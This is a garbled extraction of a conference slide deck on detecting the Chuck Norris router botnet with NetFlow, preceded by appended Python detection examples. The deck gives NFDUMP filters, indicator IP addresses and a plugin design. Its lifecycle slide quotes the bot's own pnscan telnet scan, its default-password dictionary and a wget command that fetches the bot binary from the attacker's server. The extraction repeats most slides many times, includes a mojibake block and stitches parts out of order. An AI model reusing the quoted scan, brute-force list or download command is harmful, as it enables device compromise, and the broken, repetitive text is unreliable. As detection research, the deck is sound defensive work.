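# Constructed sample records: one C&C session, one RST-refused attempt, one external
# source, two outbound DNS queries to the watched resolvers, one to the local resolver,
# and one TCP flow to the C&C host on a non-watched port.
SAMPLE_FLOWS = """\
# proto,src,sport,dst,dport,flags
TCP,192.0.2.10,41234,198.51.100.7,12000,.AP.S.
TCP,192.0.2.10,41235,198.51.100.7,12000,.A.RS.
TCP,203.0.113.5,5555,198.51.100.7,12000,.AP.S.
UDP,192.0.2.10,51000,208.67.222.222,53,......
UDP,192.0.2.10,51001,198.51.100.53,53,......
UDP,192.0.2.10,51002,192.0.2.1,53,......
TCP,192.0.2.10,41236,198.51.100.7,6667,.AP.S.
"""

if __name__ == "__main__":
    for hit in detect(SAMPLE_FLOWS.splitlines()):
        print(*hit)
    print(nfdump_filter_phase3())
    print(nfdump_filter_phase4())
```

Only the first TCP record and the two UDP records to watched resolvers are reported; the RST-carrying flow, the external source, the local resolver and the non-C&C port all fall through, which is exactly what the filter's flag and address conditions are there to exclude.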
ADSL String Detection
Looking for ADSL String
- ADSL string indicates Chuck Norris botnet
- Searching in victim's hostname or victim's WHOIS
- Querying DNS server and parsing received hostname
- Querying WHOIS database and parsing received info
[Figure: lookup output with the string "adsl" highlighted]
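The ADSL method described above is a two-source string check: a reverse-DNS lookup of the address followed by a WHOIS query, each parsed for the string "adsl". The block below is an added example, not the plugin's own code. The two lookups are passed in as callables so the parsing logic runs offline; the PTR names and WHOIS replies in the fixtures are constructed. In production the PTR callable would wrap socket.gethostbyaddr and the WHOIS callable a whois client.

```python
"""ADSL string detection on reverse-DNS names and WHOIS records.

Added example, not the NfSen plugin's own code. Lookups are injected as
callables; the PTR names and WHOIS text below are constructed fixtures.
"""
import re
from typing import Callable, Dict, List, Optional

INDICATOR = "adsl"
# Match 'adsl' only when not glued to a preceding letter, so 'adsl-1-2-3.isp.example'
# and 'ISP-ADSL-POOL' match but a word such as 'badslot' does not.
_INDICATOR_RE = re.compile(r"(?<![a-z])" + INDICATOR, re.IGNORECASE)
# WHOIS fields worth inspecting (RIPE-style keys, lower-cased by the parser).
WHOIS_FIELDS = ("netname", "descr", "org-name", "role", "remarks")


def hostname_has_indicator(hostname: Optional[str]) -> bool:
    """True when the reverse-DNS name mentions the indicator; None means no PTR record."""
    return bool(hostname) and _INDICATOR_RE.search(hostname) is not None


def parse_whois(text: str) -> Dict[str, List[str]]:
    """Parse 'key: value' lines of a WHOIS reply into a multi-valued dict, skipping comments."""
    fields: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith(("%", "#")):
            continue
        key, sep, value = line.partition(":")
        if sep:
            fields.setdefault(key.strip().lower(), []).append(value.strip())
    return fields


def whois_has_indicator(text: str) -> List[str]:
    """Return the names of the inspected WHOIS fields whose values mention the indicator."""
    fields = parse_whois(text)
    return [k for k in WHOIS_FIELDS
            if any(_INDICATOR_RE.search(v) for v in fields.get(k, []))]


def classify(ip: str,
             ptr_lookup: Callable[[str], Optional[str]],
             whois_lookup: Callable[[str], str]) -> Dict[str, object]:
    """Combine both sources for one address, as the deck's method does."""
    hostname = ptr_lookup(ip)
    host_hit = hostname_has_indicator(hostname)
    whois_hits = whois_has_indicator(whois_lookup(ip))
    return {"ip": ip, "hostname": hostname, "hostname_match": host_hit,
            "whois_fields": whois_hits, "adsl": host_hit or bool(whois_hits)}


# Constructed fixtures standing in for the live DNS and WHOIS services.
PTR_FIXTURE = {
    "192.0.2.77": "adsl-192-0-2-77.dyn.isp.example",   # hostname carries the indicator
    "192.0.2.78": None,                                 # no PTR record at all
    "192.0.2.79": "srv1.corp.example",                  # ordinary server name
}
WHOIS_FIXTURE = {
    "192.0.2.77": "% constructed reply\ninetnum: 192.0.2.0 - 192.0.2.255\nnetname: ISP-DYN\ndescr: dynamic pool\n",
    "192.0.2.78": "inetnum: 192.0.2.0 - 192.0.2.255\nnetname: ISP-ADSL-POOL\ndescr: ADSL customers\n",
    "192.0.2.79": "inetnum: 192.0.2.0 - 192.0.2.255\nnetname: CORP-NET\ndescr: Corporate LAN\n",
}


def ptr_lookup_fixture(ip: str) -> Optional[str]:
    return PTR_FIXTURE.get(ip)


def whois_lookup_fixture(ip: str) -> str:
    return WHOIS_FIXTURE.get(ip, "")


if __name__ == "__main__":
    for addr in PTR_FIXTURE:
        print(classify(addr, ptr_lookup_fixture, whois_lookup_fixture))
```

The second fixture address shows why both sources are consulted: it has no reverse-DNS name at all, and only the WHOIS netname and description reveal the ADSL pool.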
Detected Chuck Norris Servers
Known IP Addresses
- Web server addresses: 87.98.173.190, 87.98.163.86
- IRC server addresses: 87.98.173.190, 87.98.163.86
- IRC server port: 12000
- OpenDNS server addresses: 208.67.222.222, 208.67.220.220
- Spoofed DNS server: 87.98.163.86
This data is used in the detection methods by default.
IP address updates are published on the project page.
Part IV
NfSen Botnet Detection Plugin
Botnet Detection Plugin
Plugin Features
- Detects Chuck Norris-like botnet behavior
- Based on NetFlow and other network data sources
- Processes data regularly and provides real-time output
Plugin Architecture
- Compliant with NfSen plugin architecture recommendations
- PHP frontend with a Perl backend and a PostgreSQL DB
- Web, e-mail and syslog detection output and reporting
Plugin Architecture
[Diagram: BACKEND side holds cndet.pm and cndetdb.pm with the PostgreSQL database, fed by NetFlow data, DNS and the WHOIS db; FRONTEND side holds cndet.php; the two sides talk through the nfsend comm interface]
Plugin Methods Architecture
[Diagram: cndetdb.pm and PostgreSQL in the centre, fed by NetFlow data, DNS and the WHOIS db, with the five detection methods around them]
- Telnet scan detection
- Botnet distribution sites detection
- Botnet C&C centers detection
- DNS spoofing attack detection
- ADSL string detection
Web Interface – Infected Host Detected
[Screenshot of the plugin's web interface showing a detected infected host]
Part V
Conclusion
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
- scanning for possible bots
- infection of a vulnerable device
- bot initialization/update
- botnet operation
Botnet Detection Plugin Customization
- modular plugin engine
- easy modification for detection of other botnets
- we need to customize the detection methods
- plugin distributed under the BSD license
Conclusion
Network Devices Are Not Protected
- Routers, access points, printers, cameras, TVs, ...
- No AV software, missing patches and firmware updates
- But they should be protected
Experience
- NetFlow can monitor all such devices in the network
- Discovery of the new Chuck Norris botnet using NetFlow
- Developed a specialized NfSen plugin for Chuck Norris botnet detection
Future
- Chuck Norris is down but others are coming (e.g. Stuxnet)
- We are open to research collaboration
- Detection plugin is available at our project site
Thank You For Your Attention
Vojtěch Krmíček, Tomáš Plesník
{vojtec|plesnik}@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber
Detecting Botnets with NetFlow
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.
Part I
NetFlow Monitoring at MU
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 3 28
Masaryk University Brno Czech Republic
9 faculties 200 departments and institutes48 000 students and employees15 000 networked hosts2x 10 gigabit uplinks to CESNET
Interval Flows Packets Bytes
Second 5 k 150 k 132 MMinute 300 k 9 M 8 GHour 15 M 522 M 448 GDay 285 M 94 G 8 TWeek 16 G 57 G 50 T
Average traffic volume at the edgelinks in peak hours
0
500000
1000000
1500000
Mon Tue Wed Thu Fri Sat Sun
Number of Flows in MU Network (5-minute Window)
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 4 28
FlowMon Probes at Masaryk University Campus
FlowMon probes NetFlow collectors
256
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 5 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Masaryk University Brno Czech Republic
9 faculties 200 departments and institutes48 000 students and employees15 000 networked hosts2x 10 gigabit uplinks to CESNET
Interval Flows Packets Bytes
Second 5 k 150 k 132 MMinute 300 k 9 M 8 GHour 15 M 522 M 448 GDay 285 M 94 G 8 TWeek 16 G 57 G 50 T
Average traffic volume at the edgelinks in peak hours
0
500000
1000000
1500000
Mon Tue Wed Thu Fri Sat Sun
Number of Flows in MU Network (5-minute Window)
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 4 28
FlowMon Probes at Masaryk University Campus
FlowMon probes NetFlow collectors
256
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 5 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Detection Methods Overview
Five Detection Methods
Telnet scan detection
Connections to botnet distribution sites detection
Connections to botnet C&C centers detection
DNS spoofing attack detection
ADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filters
Implemented in the NfSen collector
Telnet Scan Detection – Phase I
Incoming and outgoing TCP SYN scans on port 23
[Diagram: an infected device in the local network sends TCP/23 flows (SYN/RESET flags) to a list of class C networks to scan (147.251.3.x, 147.251.18.x, 147.251.20.x, 147.251.4.x) and to further external networks.]
NFDUMP detection filter:
(net local_network) and (dst port 23) and (proto TCP) and ((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Connections to Botnet Distribution Sites – Phase II
Bot's web download requests from the infected host
[Diagram: an infected device in the local network opens TCP/80 connections (SYN/ACK flags) to the botnet distribution web servers.]
NFDUMP detection filter:
(src net local_network) and (dst ip web_servers¹) and (dst port 80) and (proto TCP) and (flags SA and not flag R)
¹ IP addresses of the attacker's botnet distribution web servers
